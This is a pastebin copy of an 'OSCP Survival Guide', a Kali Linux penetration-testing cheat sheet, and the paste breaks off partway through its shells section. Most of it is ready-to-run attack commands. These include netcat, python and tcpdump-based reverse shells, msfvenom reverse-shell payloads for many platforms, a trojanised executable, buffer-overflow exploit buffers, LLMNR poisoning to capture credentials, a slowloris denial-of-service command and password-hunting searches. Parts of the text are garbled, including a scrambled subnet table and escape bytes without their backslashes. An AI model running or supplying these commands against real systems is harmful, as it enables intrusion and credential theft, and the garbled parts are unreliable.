Paste Search Dynamic
Recent pastes
OSCP Survival Guide
  1. OSCP Survival Guide Uncensored Version
  2.  
  3. Kali Linux Offensive Security Certified Professional Playbook ​NOTE: This document refers to the target ip as the export variable $ip. To set this value on the command line use the following syntax: export ip=192.168.1.100
  4.  
  5. Table of Contents
  6.  
  7.     ●  Kali Linux
  8.  
  9.     ●  Information Gathering & Vulnerability Scanning
  10.  
  11.     ●  Passive Information Gathering
  12.  
  13.     ●  Active Information Gathering
  14.  
  15.     ●  Port Scanning
  16.  
  17.     ●  Enumeration
  18.  
  19.     ●  HTTP Enumeration
  20.  
  21.     ●  Buffer Overflows and Exploits
  22.  
  23.     ●  Shells
  24.  
  25.     ●  File Transfers
  26.  
  27.     ●  Privilege Escalation
  28.  
  29.     ●  Linux Privilege Escalation
  30.  
  31.     ●  Windows Privilege Escalation
  32.  
  33.     ●  Client, Web and Password Attacks
  34.  
  35.     ●  Client Attacks
  36.  
  37.     ●  Web Attacks
  38.  
  39.     ●  File Inclusion Vulnerabilities LFI/RFI
  40.  
  41.     ●  Database Vulnerabilities
  42.  
  43.     ●  Password Attacks
  44.  
  45.     ●  Password Hash Attacks
  46.  
  47.     ●  Networking, Pivoting and Tunneling
  48.  
  49.     ●  The Metasploit Framework
  50.  
  51.     ●  Bypassing Antivirus Software
  52.  
  53.     Kali Linux
  54.  
  55.     ●  Set the Target IP Address to the $ip system variable export ip=192.168.1.100
  56.  
  57.     ●  Find the location of a file locate sbd.exe
  58.  
  59.     ●  Search through directories in the $PATH environment variable
  60.  
  61. which sbd
  62.  
  63.     ●  Find a search for a file that contains a specific string in it’s name: find / -name sbd*
  64.  
  65.     ●  Show active internet connections netstat -lntp
  66.  
  67.     ●  Change Password passwd
  68.  
  69.     ●  Verify a service is running and listening netstat -antp |grep apache
  70.  
  71.     ●  Start a service
  72.     systemctl start ssh systemctl start apache2
  73.  
  74.     ●  Unzip a gz file
  75.     gunzip access.log.gz
  76.  
  77.     ●  Unzip a tar.gz file tar -xzvf file.tar.gz
  78.  
  79.     ●  Search command history
  80.     history | grep phrase_to_search_for
  81.  
  82.     ●  Have a service start at boot systemctl enable ssh
  83.  
  84.     ●  Stop a service systemctl stop ssh
  85.  
  86.     ●  Download a webpage
  87.     wget [www.cisco.com](http://www.cisco.com)
  88.  
  89.     ●  Open a webpage
  90.     curl [www.cisco.com](http://www.cisco.com)
  91.  
  92.     ●  String manipulation
  93.  
  94.         ○  Count number of lines in file wc index.html
  95.  
  96.         ○  Get the start or end of a file head index.html tail index.html
  97.  
  98.         ○  Extract all the lines that contain a string grep "href=" index.html
  99.  
  100.     ○  Cut a string by a delimiter, filter results then sort
  101.     grep "href=" index.html | cut -d "/" -f 3 | grep "\." | cut -d '"' -f 1 | sort -u
  102.  
  103.     ○  Using Grep and regular expressions and output to a file
  104.     cat index.html | grep -o 'http://[^"]*' | cut -d "/" -f 3 | sort –u > list.txt
  105.  
  106.    ○  Use a bash loop to find the IP address behind each host for url in $(cat list.txt); do host $url; done
  107.  
  108.    ○  Collect all the IP Addresses from a log file and sort by frequency cat access.log | cut -d " " -f 1 | sort | uniq -c | sort -urn
  109.  
  110.    ●  Decoding using Kali
  111.  
  112.        ○  Decode Base64 Encoded Values echo "QWxhZGRpbjpvcGVuIHNlc2FtZQ==" | base64 --decode
  113.  
  114.        ○  Decode Hexidecimal Encoded Values
  115.        echo "46 4c 34 36 5f 33 3a 32 396472796 63637756 8656874 327231646434
  116.  
  117.        717070756 5793437 347 3767879610a" | xxd -r -ps
  118.  
  119.    ●  Netcat - Read and write TCP and UDP Packets
  120.  
  121.        ○  Connect to a POP3 mail server nc -nv $ip 110
  122.  
  123.        ○  Listen on TCP/UDP port nc -nlvp 4444
  124.  
  125.        ○  Connect to a netcat port nc -nv $ip 4444
  126.  
  127.        ○  Send a file using netcat
  128.        nc -nv $ip 4444 < /usr/share/windows-binaries/wget.exe
  129.  
  130.        ○  Receive a file using netcat
  131.        nc -nlvp 4444 > incoming.exe
  132.  
  133.        ○  Create a reverse shell with Ncat using cmd.exe on Windows nc -nlvp 4444 -e cmd.exe
  134.  
  135.        ○  Create a reverse shell with Ncat using bash on Linux nc -nv $ip 4444 -e /bin/bash
  136.  
  137. ● Ncat
  138. ○ Reverse shell from windows using cmd.exe using ssl
  139.  
  140. - Netcat for Nmap project which provides more security avoid IDS
  141.  
  142. ncat --exec cmd.exe --allow $ip -vnl 4444 --ssl
  143.  
  144. ○ Listen on port 4444 using ssl ncat -v $ip 4444 --ssl
  145.  
  146. ● Wireshark
  147.  
  148.    ○  Show only SMTP (port 25) and ICMP traffic: tcp.port eq 25 or icmp
  149.  
  150.    ○  Show only traffic in the LAN (192.168.x.x), between workstations and servers -- no Internet: ip.src==192.168.0.0/16 and ip.dst==192.168.0.0/16
  151.  
  152.    ○  Filter by a protocol ( e.g. SIP ) and filter out unwanted IPs: ip.src != xxx.xxx.xxx.xxx && ip.dst != xxx.xxx.xxx.xxx && sip
  153.  
  154.    ○  Some commands are equal ip.addr == 10.43.54.65 Equals ip.src == 10.43.54.65 or ip.dst == 10.43.54.65
  155.  
  156.    ip.addr != 10.43.54.65 Equals ip.src != 10.43.54.65 or ip.dst != 10.43.54.65 ● Tcpdump
  157.  
  158.    ○  Display a pcap file
  159.    tcpdump -r password_cracking_filtered.pcap
  160.  
  161.    ○  Display ips and filter and sort
  162.    tcpdump -n -r password_cracking_filtered.pcap | awk -F" " '{print $3}' | sort -u |
  163.  
  164.    head
  165.  
  166.    ○  Grab a packet capture on port 80
  167.    tcpdump tcp port 80 -w output.pcap -i eth0
  168.  
  169.    ○  Check for ACK or PSH flag set in a TCP packet
  170.    tcpdump -A -n 'tcp[13] = 24' -r password_cracking_filtered.pcap
  171.  
  172. ● IPTables deny traffic to ports except for Local Loopback
  173.  
  174. ○ iptables -A INPUT -p tcp --destination-port 13327 \! -d $ip -j DROP iptables -A INPUT -p tcp --destination-port 4444 \! -d $ip -j DROP
  175.  
  176. Information Gathering & Vulnerability Scanning
  177.  
  178.  
  179. Passive Information Gathering
  180.  
  181. Google Hacking
  182.  
  183.    ●  Google search to find website sub domains
  184.    site:microsoft.com site:[www.microsoft.com](http://www.microsoft.com)
  185.  
  186.    ●  Google filetype, and intitle
  187.    intitle:”netbotz appliance” “OK” -filetype:pdf
  188.  
  189.    ●  Google inurl inurl:”level/15/sexec/-/show”
  190.  
  191.    ●  Google Hacking Database:
  192.  
  193.    ​https://www.exploit-db.com/google-hacking-database/ SSL Certificate Testing
  194.  
  195.    ​https://www.ssllabs.com/ssltest/analyze.html Email Harvesting
  196.  
  197. ● Simply Email
  198. git clone https://github.com/killswitch-GUI/SimplyEmail.git ./SimplyEmail.py -all -e
  199.  
  200. TARGET-DOMAIN Netcraft
  201.  
  202. ● Determine the operating system and tools used to build a site
  203.  
  204. ​https://searchdns.netcraft.com/ Whois Enumeration
  205.  
  206. whois domain-name-here.com whois $ip Banner Grabbing
  207.  
  208.    ●  nc-v$ip25
  209.  
  210.    ●  telnet $ip 25
  211.  
  212.    ●  nc TARGET-IP 80
  213.  
  214. Recon-ng - full-featured web reconnaissance framework written in Python
  215.  
  216.    ●  cd /opt; git clone https://LaNMaSteR53@bitbucket.org/LaNMaSteR53/recon-ng.git cd /opt/recon-ng ./recon-ng show modules help
  217.  
  218.    ●  Active Information Gathering
  219.  
  220. ● DNS
  221.  
  222. Enumeration
  223.  
  224.    ○  Host Lookup
  225.    host -t ns megacorpone.com
  226.  
  227.    ○  Reverse Lookup Brute Force - find domains in the same range
  228.    for ip in $(seq 155 190);do host 50.7.67.$ip;done |grep -v "not found"
  229.  
  230.    ○  Perform DNS IP Lookup
  231.    dig a domain-name-here.com @nameserver
  232.  
  233.    ○  Perform MX Record Lookup
  234.    dig mx domain-name-here.com @nameserver
  235.  
  236.    ○  Perform Zone Transfer with DIG
  237.    dig axfr domain-name-here.com @nameserver
  238.  
  239.    ○  DNS Zone Transfers
  240.    Windows DNS zone transfer
  241.    nslookup -> set type=any -> ls -d blah.com Linux DNS zone transfer dig axfr blah.com @ns1.blah.com
  242.  
  243.    ○  Dnsrecon DNS Brute Force
  244.    dnsrecon -d TARGET -D /usr/share/wordlists/dnsmap.txt -t std --xml ouput.xml
  245.  
  246.    ○  Dnsrecon DNS List of megacorp dnsrecon -d megacorpone.com -t axfr
  247.  
  248.    ○  DNSEnum
  249.    dnsenum zonetransfer.me
  250.  
  251.    ●
  252.  
  253. ● Port Scanning
  254.  
  255. Subnet Reference Table
  256.  
  257. /
  258.  
  259. Addresse Hosts Netmask Amount of a Class sC
  260.  
  261. /30 4 /29 8 /28 16 /27 32 /26 64 /25 128
  262.  
  263. /24 256
  264.  
  265. /23 512
  266.  
  267. /22 1024
  268.  
  269. /21 2048
  270.  
  271. /20 4096
  272.  
  273. /19 8192
  274.  
  275. /18 16384
  276.  
  277. /17 32768
  278.  
  279. /16 65536
  280.  
  281. 2 255.255.255.25 1/64 2
  282.  
  283. 6 255.255.255.24 1/32 8
  284.  
  285. 14 255.255.255.24 1/16 0
  286.  
  287. 30 255.255.255.22 1/8 4
  288.  
  289. 62 255.255.255.19 1/4 2
  290.  
  291. 126 255.255.255.12 1/2 8
  292.  
  293. 254 255.255.255.0 1 510 255.255.254.0 2 1022 255.255.252.0 4 2046 255.255.248.0 8 4094 255.255.240.0 16 8190 255.255.224.0 32 16382 255.255.192.0 64 32766 255.255.128.0 128 65534 255.255.0.0 256
  294.  
  295. Set the ip address as a varble
  296.  
  297. ● ●
  298.  
  299. export ip=192.168.1.100 nmap -A -T4 -p- $ip
  300.  
  301. Netcat port Scanning
  302. nc -nvv -w 1 -z $ip 3388-3390
  303.  
  304. Discover active IPs usign ARP on the network: arp-scan $ip/24
  305.  
  306.    ●  Discover who else is on the network netdiscover
  307.  
  308.    ●  Discover IP Mac and Mac vendors from ARP netdiscover -r $ip/24
  309.  
  310.    ●  Nmap stealth scan using SYN nmap -sS $ip
  311.  
  312.    ●  Nmap stealth scan using FIN nmap -sF $ip
  313.  
  314.    ●  Nmap Banner Grabbing nmap -sV -sT $ip
  315.  
  316.    ●  Nmap OS Fingerprinting nmap -O $ip
  317.  
  318.    ●  Nmap Regular Scan: nmap $ip/24
  319.  
  320.    ●  Enumeration Scan
  321.    nmap -p 1-65535 -sV -sS -A -T4 $ip/24 -oN nmap.txt
  322.  
  323.    ●  Enumeration Scan All Ports TCP / UDP and output to a txt file nmap -oN nmap2.txt -v -sU -sS -p- -A -T4 $ip
  324.  
  325.    ●  Nmap output to a file:
  326.    nmap -oN nmap.txt -p 1-65535 -sV -sS -A -T4 $ip/24
  327.  
  328.    ●  Quick Scan:
  329.    nmap -T4 -F $ip/24
  330.  
  331.    ●  Quick Scan Plus:
  332.    nmap -sV -T4 -O -F --version-light $ip/24
  333.  
  334.    ●  Quick traceroute
  335.    nmap -sn --traceroute $ip
  336.  
  337.    ●  All TCP and UDP Ports
  338.    nmap -v -sU -sS -p- -A -T4 $ip
  339.  
  340.    ●  Intense Scan: nmap -T4 -A -v $ip
  341.  
  342.    ●  Intense Scan Plus UDP
  343.    nmap -sS -sU -T4 -A -v $ip/24
  344.  
  345.    ●  Intense Scan ALL TCP Ports nmap -p 1-65535 -T4 -A -v $ip/24
  346.  
  347.    ●  Intense Scan - No Ping nmap -T4 -A -v -Pn $ip/24
  348.  
  349.    ●  Ping scan
  350.    nmap -sn $ip/24
  351.  
  352.    ●  Slow Comprehensive Scan
  353.    nmap -sS -sU -T4 -A -v -PE -PP -PS80,443 -PA3389 -PU40125 -PY -g 53 --script
  354.  
  355.    "default or (discovery and safe)" $ip/24
  356.  
  357.    ●  Scan with Active connect in order to weed out any spoofed ports designed to troll you nmap -p1-65535 -A -T5 -sT $ip
  358.  
  359.    ●
  360.  
  361.    Enumeration
  362.  
  363.    NMap Enumeration Script List:
  364.  
  365.    ●  NMap Discovery
  366.  
  367.    ​https://nmap.org/nsedoc/categories/discovery.html
  368.  
  369.    ●  Nmap port version detection MAXIMUM power
  370.    nmap -vvv -A --reason --script="+(safe or default) and not broadcast" -p <port>
  371.  
  372.    <host> ●
  373.  
  374. SMB Enumeration
  375.  
  376.    ●  SMB OS Discovery
  377.    nmap $ip --script smb-os-discovery.nse
  378.  
  379.    ●  Nmap port scan
  380.    nmap -v -p 139,445 -oG smb.txt $ip-254
  381.  
  382.    ●  Netbios Information Scanning nbtscan -r $ip/24
  383.  
  384.    ●  Nmap find exposed Netbios servers nmap -sU --script nbstat.nse -p 137 $ip
  385.  
  386.    ●  SMB Enumeration Tools
  387.    nmblookup -A $ip smbclient //MOUNT/share -I $ip -N rpcclient -U "" $ip enum4linux $ip
  388.  
  389.    enum4linux -a $ip
  390.  
  391.    ●  SMB Finger Printing smbclient -L //$ip
  392.  
  393.    ●  Nmap Scan for Open SMB Shares
  394.    nmap -T4 -v -oA shares --script smb-enum-shares --script-args
  395.  
  396.    smbuser=username,smbpass=password -p445 $ip/24
  397.  
  398.    ●  Nmap scans for vulnerable SMB Servers
  399.    nmap -v -p 445 --script=smb-check-vulns --script-args=unsafe=1 $ip
  400.  
  401.    ●  Nmap List all SMB scripts installed ls -l /usr/share/nmap/scripts/smb*
  402.  
  403.    ●  Enumerate SMB Users
  404.  
  405.        ○  nmap -sU -sS --script=smb-enum-users -p U:137,T:139 $ip-14
  406.  
  407.        ○  python /usr/share/doc/python-impacket-doc/examples /samrdump.py $ip
  408.  
  409.    ●  RID Cycling - Null Sessions
  410.  
  411.    ​https://www.trustedsec.com/march-2013/new-tool-release-rpc_enum-rid-cycling-attack/
  412.  
  413.        ○  ridenum.py $ip 500 50000 dict.txt
  414.  
  415.        ○  use auxiliary/scanner/smb/smb_lookupsid
  416.  
  417.    ●  Manual Null Session Testing
  418.  
  419.        ○  Windows: net use \\$ip\IPC$ "" /u:""
  420.  
  421.        ○  Linux: smbclient -L //$ip
  422.  
  423.        LLMNR / NBT-NS Spoofing - Steal credentials off the network.
  424.  
  425.    ●  Spoof / poison LLMNR / NetBIOS requests: auxiliary/spoof/llmnr/llmnr_response auxiliary/spoof/nbns/nbns_response
  426.  
  427.    ●  Capture the hashes: auxiliary/server/capture/smb auxiliary/server/capture/http_ntlm
  428.  
  429. ● Using Responder to Steal Creds
  430. git clone https://github.com/SpiderLabs/Responder.git python Responder.py -i local-ip -I
  431.  
  432. eth0
  433. SMTP Enumeration - Mail Severs
  434.  
  435. ● Verify SMTP port using Netcat nc -nv $ip 25
  436.  
  437. SNMP Enumeration -Simple Network Management Protocol
  438.  
  439.    ●  Fix SNMP output values so they are human readable
  440.    apt-get install snmp-mibs-downloader download-mibs echo "" > /etc/snmp/snmp.conf
  441.  
  442.    ●  SNMP Enumeration Commands
  443.  
  444.        ○  snmpcheck -t $ip -c public
  445.  
  446.        ○  snmpwalk -c public -v1 $ip 1|
  447.  
  448.        ○  grep hrSWRunName|cut -d* * -f
  449.  
  450.        ○  snmpenum -t $ip
  451.  
  452.        ○  onesixtyone -c names -i hosts
  453.  
  454.    ●  SNMPv3 Enumeration
  455.    nmap -sV -p 161 --script=snmp-info $ip/24
  456.  
  457.    ●  Automate the username enumeration process for SNMPv3: apt-get install snmp snmp-mibs-downloader wget
  458.  
  459.    <https://raw.githubusercontent.com/raesene/TestingScripts/master/snmpv3enum.rb&gt;
  460.  
  461.    ●  SNMP Default Credentials /usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt
  462.  
  463. Linux OS Enumeration
  464.  
  465.    ●  List all SUID files
  466.    find / -perm -4000 2&gt;/dev/null
  467.  
  468.    ●  Determine the current version of Linux
  469.  
  470. cat /etc/issue
  471.  
  472.    ●  Determine more information about the environment uname -a
  473.  
  474.    ●  List processes running ps -xaf
  475.  
  476.    ●  List the allowed (and forbidden) commands for the invoking use sudo -l
  477.  
  478.    ●  List iptables rules
  479.    iptables --table nat --list iptables -vL -t filter iptables -vL -t nat iptables -vL -t mangle
  480.  
  481.    iptables -vL -t raw iptables -vL -t security Windows OS Enumeration
  482.  
  483.    ●  net config Workstation
  484.  
  485.    ●  systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
  486.  
  487.    ●  hostname
  488.  
  489.    ●  net users
  490.  
  491.    ●  ipconfig /all
  492.  
  493.    ●  route print
  494.  
  495.    ●  arp-A
  496.  
  497.    ●  netstat -ano
  498.  
  499.    ●  netsh firewall show state
  500.  
  501.    ●  netsh firewall show config
  502.  
  503.    ●  schtasks /query /fo LIST /v
  504.  
  505.    ●  tasklist /SVC
  506.  
  507.    ●  net start
  508.  
  509.    ●  DRIVERQUERY
  510.  
  511.    ●  reg query
  512.  
  513. HKLMSOFTWAREPoliciesMicrosoftWindowsInstallerAlwaysInstallElevated
  514.  
  515.    ●  reg query HKCUSOFTWAREPoliciesMicrosoftWindowsInstallerAlwaysInstallElevated
  516.  
  517.    ●  dir /s ​pass​ == ​cred​ == v​ nc​ == ​.config
  518.  
  519.    ●  findstr /si password *.xml *.ini *.txt
  520.  
  521.    ●  reg query HKLM /f password /t REG_SZ /s
  522.  
  523.    ●  reg query HKCU /f password /t REG_SZ /s
  524.  
  525.    Vulnerability Scanning with Nmap Nmap Exploit Scripts
  526.  
  527.    ​https://nmap.org/nsedoc/categories/exploit.html Nmap search through vulnerability scripts
  528.  
  529.    cd /usr/share/nmap/scripts/ ls -l *vuln*
  530.  
  531.    Nmap search through Nmap Scripts for a specific keyword ls /usr/share/nmap/scripts/* | grep ftp
  532.  
  533.    Scan for vulnerable exploits with nmap nmap --script exploit -Pn $ip
  534.  
  535.    NMap Auth Scripts
  536.  
  537.    ​https://nmap.org/nsedoc/categories/auth.html Nmap Vuln Scanning
  538.  
  539.    ​https://nmap.org/nsedoc/categories/vuln.html
  540.  
  541.    NMap DOS Scanning
  542.    nmap --script dos -Pn $ip NMap Execute DOS Attack nmap --max-parallelism 750 -Pn --script
  543.  
  544.    http-slowloris --script-args http-slowloris.runforever=true
  545.  
  546.    Scan for coldfusion web vulnerabilities
  547.    nmap -v -p 80 --script=http-vuln-cve2010-2861 $ip
  548.  
  549.    Anonymous FTP dump with Nmap
  550.    nmap -v -p 21 --script=ftp-anon.nse $ip-254
  551.  
  552.    SMB Security mode scan with Nmap
  553.    nmap -v -p 21 --script=ftp-anon.nse $ip-254
  554.  
  555.    File Enumeration
  556.  
  557.    ●  Find UID 0 files root execution
  558.  
  559.    ●  /usr/bin/find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \; 2&gt;/dev/null
  560.  
  561.    ●  Get handy linux file system enumeration script (/var/tmp)
  562.    wget <https://highon.coffee/downloads/linux-local-enum.sh&gt; chmod +x
  563.  
  564.    ./linux-local-enum.sh ./linux-local-enum.sh
  565.  
  566.    ●  Find executable files updated in August
  567.    find / -executable -type f 2&gt; /dev/null | egrep -v "^/bin|^/var|^/etc|^/usr" | xargs ls -lh |
  568.  
  569.    grep Aug
  570.  
  571.    ●  Find a specific file on linux find /. -name suid*
  572.  
  573.    ●  Find all the strings in a file strings &lt;filename&gt;
  574.  
  575.    ●  Determine the type of a file file &lt;filename&gt;
  576.  
  577.    ●  HTTP Enumeration
  578.  
  579.        ○  Search for folders with gobuster:
  580.  
  581.        gobuster -w /usr/share/wordlists/dirb/common.txt -u $ip
  582.  
  583.        ○  OWasp DirBuster - Http folder enumeration - can take a dictionary file
  584.  
  585.        ○  Dirb - Directory brute force finding using a dictionary file dirb http://$ip/ wordlist.dict dirb <http://vm/&gt;
  586.  
  587.        Dirb against a proxy
  588.  
  589.        ○  dirb [http://$ip/](http://172.16.0.19/) -p $ip:3129
  590.  
  591.        ○  Nikto
  592.        nikto -h $ip
  593.  
  594.        ○  HTTP Enumeration with NMAP
  595.        nmap --script=http-enum -p80 -n $ip/24
  596.  
  597.    ○  Nmap Check the server methods
  598.    nmap --script http-methods --script-args http-methods.url-path='/test' $ip
  599.  
  600.    ○  Get Options available from web server curl -vX OPTIONS vm/test
  601.  
  602.    ○  Uniscan directory finder: uniscan -qweds -u <http://vm/&gt;
  603.  
  604.    ○  Wfuzz - The web brute forcer
  605.  
  606.    wfuzz -c -w /usr/share/wfuzz/wordlist/general/megabeast.txt $ip:60080/?FUZZ=test
  607.  
  608.    wfuzz -c --hw 114 -w /usr/share/wfuzz/wordlist/general/megabeast.txt $ip:60080/?page=FUZZ
  609.  
  610.    wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt "$ip:60080/?page=mailer&mail=FUZZ"
  611.  
  612.    wfuzz -c -w /usr/share/seclists/Discovery/Web_Content/common.txt --hc 404 $ip/FUZZ
  613.  
  614.    Recurse level 3
  615.  
  616.    wfuzz -c -w /usr/share/seclists/Discovery/Web_Content/common.txt -R 3 --sc 200 $ip/FUZZ
  617.  
  618.    ●  Open a service using a port knock (Secured with Knockd)
  619.    for x in 7000 8000 9000; do nmap -Pn --host_timeout 201 --max-retries 0 -p $x
  620.  
  621.    server_ip_address; done
  622.  
  623.    ●  WordPress Scan - Wordpress security scanner
  624.  
  625. ○ wpscan --url $ip/blog --proxy $ip:3129
  626.  
  627.    ●  RSH Enumeration - Unencrypted file transfer system
  628.  
  629.    ○ auxiliary/scanner/rservices/rsh_login
  630.  
  631.    ●  Finger Enumeration
  632.  
  633.        ○  finger @$ip
  634.  
  635.        ○  finger batman@$ip
  636.  
  637.    ●  TLS & SSL Testing
  638.  
  639. ○ ./testssl.sh -e -E -f -p -y -Y -S -P -c -H -U $ip | aha > OUTPUT-FILE.html ● Proxy Enumeration (useful for open proxies)
  640.  
  641. ○ nikto -useproxy http://$ip:3128 -h $ip ● Steganography
  642.  
  643.  
  644. apt-get install steghide steghide extract -sf picture.jpg steghide info picture.jpg apt-get install stegosuite
  645.  
  646. The OpenVAS Vulnerability Scanner
  647.  
  648.    ○  apt-get update
  649.    apt-get install openvas openvas-setup
  650.  
  651.    ○  netstat -tulpn
  652.  
  653.    ○  Login at: https://$ip:9392
  654.  
  655. Buffer Overflows and Exploits
  656.  
  657.    ●  DEP and ASLR - Data Execution Prevention (DEP) and Address Space Layout Randomization (ASLR)
  658.  
  659.    ●  MSFvenom
  660.  
  661.    ​https://www.offensive-security.com/metasploit-unleashed/msfvenom/
  662.  
  663.    ●  Windows Buffer Overflows
  664.  
  665.        ○  Controlling EIP
  666.  
  667.        ○  locate pattern_create
  668.  
  669.        ○  pattern_create.rb -l 2700
  670.  
  671.        ○  locate pattern_offset
  672.  
  673.        ○  pattern_offset.rb -q 39694438
  674.  
  675.        ○  Verify exact location of EIP - [*] Exact match at offset 2606
  676.  
  677.    ○  buffer="A"*2606+"B"*4+"C"*90
  678.  
  679.    ○  Check for “Bad Characters” - Run multiple times 0x00 - 0xFF
  680.  
  681.    ○  Use Mona to determine a module that is unprotected
  682.  
  683.    ○  Bypass DEP if present by finding a Memory Location with Read and Execute access for JMP ESP
  684.  
  685.    ○  Otherwise without DEP, we can stick our
  686.  
  687.    ○  Use NASM to determine the HEX code for a JMP ESP instruction
  688.  
  689.    ■ /usr/share/metasploit-framework/tools/exploit/nasm_shell.rb
  690.  
  691. ■ JMP ESP
  692. 00000000 FFE4 jmp esp
  693.  
  694.    ○  Run Mona in immunity log window to find (FFE4) XEF command
  695.  
  696.    ○  !mona find -s "xffxe4" -m slmfc.dll
  697.    found at 0x5f4a358f - Flip around for little endian format
  698.  
  699.    ○  buffer = "A" * 2606 + "x8fx35x4ax5f" + "C" * 390
  700.  
  701.    ○  MSFVenom to create payload
  702.    msfvenom -p windows/shell_reverse_tcp LHOST=$ip LPORT=443 -f c –e
  703.  
  704.    x86/shikata_ga_nai -b "x00x0ax0d"
  705.  
  706.    ○  Final Payload with NOP slide
  707.    buffer="A"*2606 + "x8fx35x4ax5f" + "x90" * 8 + shellcode
  708.  
  709.    ○  Create a PE Reverse Shell
  710.    msfvenom -p windows/shell_reverse_tcp LHOST=$ip LPORT=4444 -f exe -o shell_reverse.exe
  711.  
  712.    ○  Create a PE Reverse Shell and Encode 9 times with Shikata_ga_nai msfvenom -p windows/shell_reverse_tcp LHOST=$ip LPORT=4444 -f exe -e x86/shikata_ga_nai -i 9 -o shell_reverse_msf_encoded.exe
  713.  
  714.    ○  Create a PE reverse shell and embed it into an existing executable msfvenom -p windows/shell_reverse_tcp LHOST=$ip LPORT=4444 -f exe -e
  715.  
  716.    x86/shikata_ga_nai -i 9 -x /usr/share/windows-binaries/plink.exe -o shell_reverse_msf_encoded_embedded.exe
  717.  
  718.    ○  Create a PE Reverse HTTPS shell
  719.    msfvenom -p windows/meterpreter/reverse_https LHOST=$ip LPORT=443 -f
  720.  
  721.    exe -o met_https_reverse.exe
  722.  
  723. ● Linux ○
  724.  
  725.  
  726. ○ ○
  727.  
  728. ○ ○
  729.  
  730.  
  731. Shells
  732.  
  733.    ●  Netcat Shell Listener nc -nlvp 443
  734.  
  735.    ●  Spawning a TTY Shell - Break out of Jail or limited shell You should almost always upgrade your shell after taking control of an apache or www user. (For example when you encounter an error message when trying to run an exploit sh: no job control in this shell ) (hint: sudo -l to see what you can run)
  736.  
  737. ○ You may encounter limited shells that use rbash and only allow you to execute a single command per session. You can overcome this by executing an SSH shell to your localhost:
  738.  
  739. ssh user@$ip nc $localip 4444 -e /bin/sh enter user's password
  740. python -c 'import pty; pty.spawn("/bin/sh")'
  741.  
  742. Buffer Overflows
  743.  
  744. Run Evans Debugger against an app
  745. edb --run /usr/games/crossfire/bin/crossfire
  746.  
  747. ESP register points toward the end of our CBuffer add eax,12
  748. jmp eax
  749. 83C00C add eax,byte +0xc
  750.  
  751. FFE0 jmp eax
  752.  
  753. Check for “Bad Characters” Process of elimination - Run multiple times 0x00 - 0xFF
  754.  
  755. Find JMP ESP address
  756. "x97x45x13x08" # Found at Address 08134597
  757.  
  758. crash = "x41" * 4368 + "x97x45x13x08" + "x83xc0x0cxffxe0x90x90"
  759.  
  760. msfvenom -p linux/x86/shell_bind_tcp LPORT=4444 -f c -b "x00x0ax0dx20" –e x86/shikata_ga_nai
  761.  
  762. Connect to the shell with netcat: nc -v $ip 4444
  763.  
  764. export TERM=linux
  765.  
  766.     ○  python -c 'import pty; pty.spawn("/bin/sh")'
  767.  
  768.     ○  python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) ; s.connect(("$ip",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
  769.  
  770.     ○  echo os.system('/bin/bash')
  771.  
  772.     ○  /bin/sh -i
  773.  
  774.     ○  perl —e 'exec "/bin/sh";'
  775.  
  776.     ○  perl: exec "/bin/sh";
  777.  
  778.     ○  ruby: exec "/bin/sh"
  779.  
  780.     ○  lua: os.execute('/bin/sh')
  781.  
  782.     ○  (From within IRB) exec "/bin/sh"
  783.  
  784.     ○  (From within vi) :!bash
  785.  
  786.     ○  From within vim
  787.     Breaking out of vim is done by ':!bash':
  788.  
  789.     ○  (From within vi)
  790.     :set shell=/bin/bash:shell
  791.  
  792.     ○  (From within nmap) !sh
  793.  
  794.     ○  (From within tcpdump)
  795.     echo $’idn/bin/netcat $ip 443 –e /bin/bash’ > /tmp/.test
  796.     chmod +x /tmp/.test
  797.     sudo tcpdump –ln –I eth- -w /dev/null –W 1 –G 1 –z /tmp/.tst –Z root
  798.  
  799.     ○  from busybox
  800.     /bin/busybox telnetd -|/bin/sh -p9999
  801.  
  802. ● Pen test monkey PHP reverse shell
  803.  
  804. ​http://pentestmonkey.net/tools/web-shells/php-reverse-shel
  805.  
  806.     ●  php-findsock-shell - turns PHP port 80 into an interactive shell
  807.  
  808.     ​http://pentestmonkey.net/tools/web-shells/php-findsock-shell
  809.  
  810.     ●  Perl Reverse Shell
  811.  
  812.     ​http://pentestmonkey.net/tools/web-shells/perl-reverse-shell
  813.  
  814.     ●  PHP powered web browser Shell b374k with file upload etc.
  815.  
  816.     ​https://github.com/b374k/b374k
  817.  
  818.     ●  Windows reverse shell - PowerSploit’s Invoke-Shellcode script and inject a Meterpreter shell
  819.  
  820.     https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-She llcode.ps1
  821.  
  822.     ●  Web Backdoors from Fuzzdb (
  823.  
  824.     https://github.com/fuzzdb-project/fuzzdb/tree/master/web-backdoors
  825.  
  826.     ●  Creating Meterpreter Shells with MSFVenom -
  827.  
  828.     http://www.securityunlocked.com/2016/01/02/network-security-pentesting/most-useful-m sfvenom-payloads/
  829.  
  830.     ​Linux
  831.     msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elf ​Windows
  832.     msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exe ​Mac
  833.     msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f macho > shell.macho ​Web Payloads
  834.     ​PHP
  835.     msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.php
  836.     cat shell.php | pbcopy && echo '<?php ' | tr -d 'n' > shell.php && pbpaste >> shell.php ​ASP
  837.     msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell.asp ​JSP
  838.     msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp
  839.  
  840. ​WAR
  841. msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war ​Scripting Payloads
  842. ​Python
  843. msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw > shell.py ​Bash
  844. msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.sh ​Perl
  845. msfvenom -p cmd/unix/reverse_perl LHOST= LPORT= -f raw > shell.pl ​Shellcode
  846.  
